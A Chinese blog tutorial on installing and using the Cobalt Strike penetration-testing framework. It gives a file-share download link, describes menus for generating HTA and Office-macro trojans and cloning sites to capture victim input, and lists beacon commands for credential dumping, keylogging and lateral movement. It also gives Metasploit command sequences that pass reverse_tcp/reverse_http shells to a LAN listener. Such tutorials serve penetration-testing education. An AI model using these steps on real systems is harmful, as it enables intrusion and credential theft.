CobaltStrike的安装与简单使用

CobaltStrike的使用

Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。但现在已经独立出来了

1、安装

网上的资源和安装还是挺多的,但安全性可能就没保障了。

链接:https://pan.baidu.com/s/1Qc0yEchaY_H-RIM0TsD8tw
提取码:ha7j

2、启动

./teamserver ip password #ip和password根据自己需要填写

./start.sh #另开一个终端输入

这里需要给这两个文件足够的权限

主界面:

搜狗截图20200628194843

3、基础功能

(参考:https://www.jianshu.com/p/8d823adbc6b5)

Cobalt Strike

img
Copy
New Connection #新的连接(支持连接多个服务器端) Preferences #偏好设置(设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录等) Visualization #窗口视图模式(展示输出结果的形式) VPN Interfaces #VPN接入 Listenrs #监听器(创建Listener) Script Manager #脚本管理 Close #关闭

View

img
Copy
Applications #应用(显示受害者机器的应用信息) Credentials #凭证(通过hashdump或Mimikatz抓取过的密码都会储存在这里) Downloads #下载文件 Event Log #事件日志(主机上线记录以及团队协作聊天记录) Keystrokes #键盘记录 Proxy Pivots #代理模块 Screenshots #截图 Script Console #脚本控制台(可以加载各种脚本,增强功能https://github.com/rsmudge/cortana-scripts) Targets #显示目标主机 Web Log #Web日志

Attacks

Packages
img
Copy
HTML Application #生成恶意的HTA木马文件 MS Office Macro #生成office宏病毒文件 Payload Generator #生成各种语言版本的payload USB/CD AutoPlay #生成利用自动播放运行的木马文件 Windows Dropper #捆绑器,能够对文档类进行捆绑 Windows Executable #生成可执行Payload Windows Executable(S) #把包含payload,Stageless生成可执行文件(包含多数功能)
Web Drive-by
img
Copy
Manage #对开启的web服务进行管理 Clone Site #克隆网站(可记录受害者提交的数据) Host File #提供Web以供下载某文件 Scripted Web Delivery #提供Web服务,便于下载和执行PowerShell Payload,类似于Metasploit的web_delivery Signed Applet Attack #启动一个Web服务以提供自签名Java Applet的运行环境 Smart Applet Attack #自动检测Java版本并利用已知的exploits绕过security System Profiler #用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等

Reporting

img
Copy
0. Activity report #活动报告 1. Hosts report #主机报告 2. Indicators of Compromise #威胁报告 3. Sessions report #会话报告 4. Social engineering report #社会工程学报告 5. Tactics, Techniques, and Procedures #策略、技巧和程序 Reset Data #重置数据 Export Data #导出数据

Help

img
Copy
Homepage #官方主页 Support #技术支持 Arsenal #开发者 System information #版本信息 About #关于

4、监听listener

这一步直接设置监听器即可

5、interact(beacon界面的命令)

Copy
beacon> help Beacon Commands =============== Command Description ------- ----------- argue 进程参数欺骗 blockdlls 阻止子进程加载非Microsoft DLL browserpivot 注入受害者浏览器进程 bypassuac 绕过UAC提升权限 cancel 取消正在进行的下载 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beacon内部的任务队列 connect Connect to a Beacon peer over TCP covertvpn 部署Covert VPN客户端 cp 复制文件 dcsync 从DC中提取密码哈希 desktop 远程桌面(VNC) dllinject 反射DLL注入进程 dllload 使用LoadLibrary将DLL加载到进程中 download 下载文件 downloads 列出正在进行的文件下载 drives 列出目标盘符 elevate 使用exp execute 在目标上执行程序(无输出) execute-assembly 在目标上内存中执行本地.NET程序 exit 终止beacon会话 getprivs Enable system privileges on current token getsystem 尝试获取SYSTEM权限 getuid 获取用户ID hashdump 转储密码哈希值 help 帮助 inject 在注入进程生成会话 jobkill 结束一个后台任务 jobs 列出后台任务 kerberos_ccache_use 从ccache文件中导入票据应用于此会话 kerberos_ticket_purge 清除当前会话的票据 kerberos_ticket_use Apply 从ticket文件中导入票据应用于此会话 keylogger 键盘记录 kill 结束进程 link Connect to a Beacon peer over a named pipe logonpasswords 使用mimikatz转储凭据和哈希值 ls 列出文件 make_token 创建令牌以传递凭据 mimikatz 运行mimikatz mkdir 创建一个目录 mode dns 使用DNS A作为通信通道(仅限DNS beacon) mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon) mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon) mode http 使用HTTP作为通信通道 mv 移动文件 net net命令 note 备注 portscan 进行端口扫描 powerpick 通过Unmanaged PowerShell执行命令 powershell 通过powershell.exe执行命令 powershell-import 导入powershell脚本 ppid Set parent PID for spawned post-ex jobs ps 显示进程列表 psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host psinject 在特定进程中执行PowerShell命令 pth 使用Mimikatz进行传递哈希 pwd 当前目录位置 reg Query the registry rev2self 恢复原始令牌 rm 删除文件或文件夹 rportfwd 端口转发 run 在目标上执行程序(返回输出) runas 以其他用户权限执行程序 runasadmin 在高权限下执行程序 runu Execute a program under another PID screenshot 屏幕截图 setenv 设置环境变量 shell 执行cmd命令 shinject 将shellcode注入进程 shspawn 启动一个进程并将shellcode注入其中 sleep 设置睡眠延迟时间 socks 启动SOCKS4代理 socks stop 停止SOCKS4 spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh 使用ssh连接远程主机 ssh-key 使用密钥连接远程主机 steal_token 从进程中窃取令牌 timestomp 将一个文件的时间戳应用到另一个文件 unlink Disconnect from parent Beacon upload 上传文件 wdigest 使用mimikatz转储明文凭据 winrm 使用WinRM横向渗透 wmi 使用WMI横向渗透

6、cobalt strike和msf联动

msf 派生 shell 给 Cobalt strike(前提有一个meterpreter)

Copy
msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.229.143 msf exploit(payload_inject) > set LPORT 1212 msf exploit(payload_inject) > set SESSION 1 msf exploit(payload_inject) > exploit

Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)

Copy
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.100 lhost => 192.168.1.100 msf exploit(handler) > set lport 5555 lport => 5555 msf exploit(handler) > exploit

之后使用Cobalt Strike创建一个

Copy
windows/foreign/reverse_tcp Listener

其中ip为msf的ip地址,端口为msf所监听的端口。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
msf中即可看到成功获取了meterpreter会话

posted @   zw1sh  阅读(4256)  评论(2编辑  收藏  举报
编辑推荐:
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· AI 智能体引爆开源社区「GitHub 热点速览」
· 写一个简单的SQL生成工具
点击右上角即可分享
微信分享提示